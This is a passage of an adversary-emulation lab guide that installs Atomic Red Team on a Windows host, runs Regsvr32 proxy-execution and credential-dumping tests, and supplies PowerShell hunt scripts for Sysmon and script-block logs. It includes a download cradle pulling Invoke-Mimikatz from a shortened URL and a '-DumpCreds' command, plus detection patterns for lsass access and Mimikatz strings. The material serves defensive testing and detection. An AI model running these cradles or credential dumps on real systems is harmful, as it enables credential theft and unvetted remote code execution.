The Atomic Red Team framework is a “Small and highly portable [framework for] detection tests based on MITRE's ATT&CK.” The tool is designed as an adversarial simulation test engine. For example, if an organization wishes to test its controls against T1003 – Credential Dumping – it can do this with a single command (after a one-liner installation of the framework).
Investigate the Atomic Red Team framework. ART is a widely used open-source framework for adversary emulation: each "atomic" is a small, self-contained test mapped to an ATT&CK technique.
Use the MITRE ATT&CK framework to simulate adversary techniques efficiently, then hunt for the Indicators of Compromise those simulations leave behind.
Install Atomic Red Team Framework
Connect via Remote Desktop to the Member Server, WS01.
Launch Windows PowerShell from the Windows Start Menu.
Run the following command to allow the Atomic Red Team scripts to execute. Note that the execution policy is not a security boundary; Bypass simply stops PowerShell from blocking unsigned scripts. If you prefer not to leave the machine-wide policy changed after the lab, add -Scope Process so the setting applies only to this session.
Set-ExecutionPolicy bypass -force
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\users\itadmin> Set-ExecutionPolicy bypass -force
PS C:\users\itadmin>
The next commands install the framework. The first line forces TLS 1.2, which GitHub requires and which the .NET Framework underneath Windows PowerShell may not negotiate by default; the third line downloads and runs the installer script, and the last line installs the module together with the atomics (the test definitions).
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$ProgressPreference = 'SilentlyContinue'
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics -Force
You may get prompted to install a "NuGet" provider. Accept all requests for installation.
Now that Atomic Red Team (ART) is installed, move on to the next portion of this lab.
Continue to operate from the PowerShell session from the previous lab section. Details on connecting to the PowerShell session are found in the prior lab section. Perform an atomic test. In this example, technique T1218 (Signed Binary Proxy Execution), sub-technique 010 (Regsvr32) is run, and its tests "pop" multiple instances of Calculator. Invoke-AtomicTest runs every test defined for the technique unless you select one with -TestNumbers; run the same command with -Cleanup once you have finished hunting so the test artifacts are removed.
Invoke-AtomicTest T1218.010
Continue on to the next portion of this lab.
The next step is an architecture investigation of the Atomic Red Team framework, including a review of how the T1218 tests are structured and executed.
Navigate to the atomics folder at C:\AtomicRedTeam\atomics\T1218.010 using Windows Explorer. The folder contains several files of interest. T1218.010.md describes each atomic test mapped to this sub-technique. T1218.010.yaml holds the executable definitions, including the exact command invocations that Invoke-AtomicTest runs.
C:\AtomicRedTeam\atomics\T1218.010
Right (alternate) click the T1218.010.yaml file and choose Open with, then pick a plain text editor. The Open with prompt window may look different. Clear the check box for Always use so that .yaml files are not permanently associated with the editor.
As seen in the next screenshot, the executor command lines in the yaml supply the search terms for a SIEM to start the hunt (red arrows): regsvr32.exe invoked with /s /u /i: pointing at a scriptlet, with scrobj.dll as the host DLL. Those tokens, together with the parent process and the time window of the test, are what to search for.
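The following PowerShell ties the two preceding steps together: it reads the hunt terms directly from T1218.010.yaml instead of from the screenshot, runs the atomic test inside a recorded time window, and then searches process-creation events in that window for regsvr32.exe command lines carrying those terms. This is an added example for this lab, not code from the original page or from the Atomic Red Team project. It assumes the module was installed to the default C:\AtomicRedTeam path as above (so its powershell-yaml dependency is present), that the session is elevated (the Security log requires it), and that WS01 records process creation either through Sysmon (event ID 1) or through Security event 4688 with command-line auditing enabled; the regex tokens and the 30-second grace period are choices made here.

```powershell
# Added example (not part of the original lab or of the Atomic Red Team project).
# Assumptions: default install path, elevated session, and process-creation logging
# via Sysmon event 1 and/or Security 4688 with command-line auditing.
Import-Module 'C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1' -Force
Import-Module powershell-yaml

$technique  = 'T1218.010'
$atomicYaml = "C:\AtomicRedTeam\atomics\$technique\$technique.yaml"

# 1. Read the hunt terms from the atomic definition: each test's executor and command.
$atomic = ConvertFrom-Yaml (Get-Content -Path $atomicYaml -Raw)
$atomic.atomic_tests | ForEach-Object {
    [pscustomobject]@{
        Test     = $_.name
        Executor = $_.executor.name
        Command  = ($_.executor.command -replace '\s+', ' ').Trim()
    }
} | Format-Table -AutoSize -Wrap

# Returns the value of a named <Data> element from an event's XML payload, so the
# same code works for Sysmon and Security events whose field names differ.
function Get-EventField {
    param($Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# 2. Hunt: regsvr32.exe launches whose command line carries the tokens the yaml uses
#    (/i: for the scriptlet, scrobj.dll as the host DLL, or an .sct file).
#    PowerShell -match is case-insensitive by default.
function Find-Regsvr32Proxy {
    param([datetime]$Start, [datetime]$End)
    $sources = @(
        @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1;    Image = 'Image';          Parent = 'ParentImage' },
        @{ LogName = 'Security';                             Id = 4688; Image = 'NewProcessName'; Parent = 'ParentProcessName' }
    )
    foreach ($s in $sources) {
        $filter = @{ LogName = $s.LogName; Id = $s.Id; StartTime = $Start; EndTime = $End }
        # SilentlyContinue: a missing log or an empty window is not an error for the hunt.
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            $image = Get-EventField $_ $s.Image
            $cmd   = Get-EventField $_ 'CommandLine'
            if ($image -match '\\regsvr32\.exe$' -and $cmd -match '/i:|scrobj\.dll|\.sct') {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    Log         = $s.LogName
                    Parent      = Get-EventField $_ $s.Parent
                    CommandLine = $cmd
                }
            }
        }
    }
}

# 3. Run the test bracketed by timestamps, hunt inside that window, then clean up.
Invoke-AtomicTest $technique -GetPrereqs
$start = Get-Date
Invoke-AtomicTest $technique -ExecutionLogPath "$env:TEMP\art-$technique.csv"
$end = (Get-Date).AddSeconds(30)   # small grace period for event delivery
Find-Regsvr32Proxy -Start $start -End $end | Format-Table -AutoSize -Wrap
Invoke-AtomicTest $technique -Cleanup
```

The execution log written by -ExecutionLogPath records the exact time, host and user of each test, which is the ground truth to reconcile against the hunt results: every row in the log should have a matching regsvr32.exe event, and any event outside the window deserves a closer look.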
Continue on to the next portion of this lab.
Continue to operate from the PowerShell session from the previous lab section. Details on connecting to the PowerShell session are found in the prior lab section. As of this update, running this technique through Invoke-AtomicTest fails because of the SSL / TLS negotiation issue in Windows PowerShell discussed earlier.
The following error was occurring as of 04FEB21.
Correcting it requires an upstream change to the AtomicRedTeam repository. In the meantime, the commands the atomic test would run can be entered manually.
Let's run technique T1003, Credential Dumping, with the following manual commands:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1tCrad1e')
Invoke-Mimikatz -DumpCreds
The download cradle is run directly in the current session rather than through a separate powershell.exe, so the TLS 1.2 setting on the first line applies to the download and Invoke-Mimikatz is defined in the same session that calls it on the third line (wrapped in a child powershell.exe, the function would vanish when that process exited and the third line would fail). The shortened URL resolves to a hosted copy of the Invoke-Mimikatz script that the atomic test uses. Expect endpoint protection on WS01 to flag or block it; that alert is itself a result worth recording in the hunt.
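Having run credential dumping by hand, the hunt should confirm it was observed. The PowerShell below is an added example for this lab, not code from the original page or from the Atomic Red Team project. It looks for the two traces the manual commands above leave: a process opening lsass.exe with read access (Sysmon event ID 10, ProcessAccess), and the download cradle and Invoke-Mimikatz text in PowerShell script block logs (event ID 4104). It assumes Sysmon is installed on WS01 with ProcessAccess logging in its configuration, that script block logging is enabled, and that the session is elevated; the benign-source allow-list and the 15-minute window are assumptions to tune for the environment.

```powershell
# Added example (not part of the original lab or of the Atomic Red Team project).
# Assumptions: Sysmon with ProcessAccess (event 10) logging, PowerShell script block
# logging (event 4104 in Microsoft-Windows-PowerShell/Operational), elevated session.

# Returns the value of a named <Data> element from an event's XML payload.
function Get-EventField {
    param($Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

# Credential dumpers open lsass.exe with PROCESS_VM_READ (0x0010), usually combined with
# PROCESS_QUERY_INFORMATION (0x0400) or PROCESS_QUERY_LIMITED_INFORMATION (0x1000),
# giving masks such as 0x1010 or 0x1410. Any process outside the allow-list reading
# lsass memory is the hunt condition; the allow-list is an assumption to tune locally.
function Find-LsassAccess {
    param([datetime]$Start, [datetime]$End)
    $benignSources = @('\\csrss\.exe$', '\\wininit\.exe$', '\\MsMpEng\.exe$')
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = $Start; EndTime = $End }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $target = Get-EventField $_ 'TargetImage'
        $source = Get-EventField $_ 'SourceImage'
        # Sysmon reports GrantedAccess as a hex string such as 0x1010.
        $access = [Convert]::ToInt32((Get-EventField $_ 'GrantedAccess'), 16)
        $isBenign = [bool]($benignSources | Where-Object { $source -match $_ })
        if ($target -match '\\lsass\.exe$' -and ($access -band 0x10) -and -not $isBenign) {
            [pscustomobject]@{
                Time          = $_.TimeCreated
                SourceImage   = $source
                GrantedAccess = '0x{0:X4}' -f $access
                CallTrace     = Get-EventField $_ 'CallTrace'
            }
        }
    }
}

# The cradle and Invoke-Mimikatz itself land in script block logs; the strings below
# come from the manual commands in this lab section.
function Find-CredentialDumpScriptBlock {
    param([datetime]$Start, [datetime]$End)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Start; EndTime = $End }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = Get-EventField $_ 'ScriptBlockText'
        if ($text -and $text -match 'Invoke-Mimikatz|DumpCreds|sekurlsa|DownloadString\(') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Hunt over the last 15 minutes, which should cover the manual run above.
$end   = Get-Date
$start = $end.AddMinutes(-15)
Find-LsassAccess -Start $start -End $end | Format-Table -AutoSize -Wrap
Find-CredentialDumpScriptBlock -Start $start -End $end | Format-Table -AutoSize -Wrap
```

If endpoint protection blocked the download, the script block search still returns the cradle line while the lsass search returns nothing; that pairing tells you the control worked before the dump, which is as useful a finding as a successful dump would be.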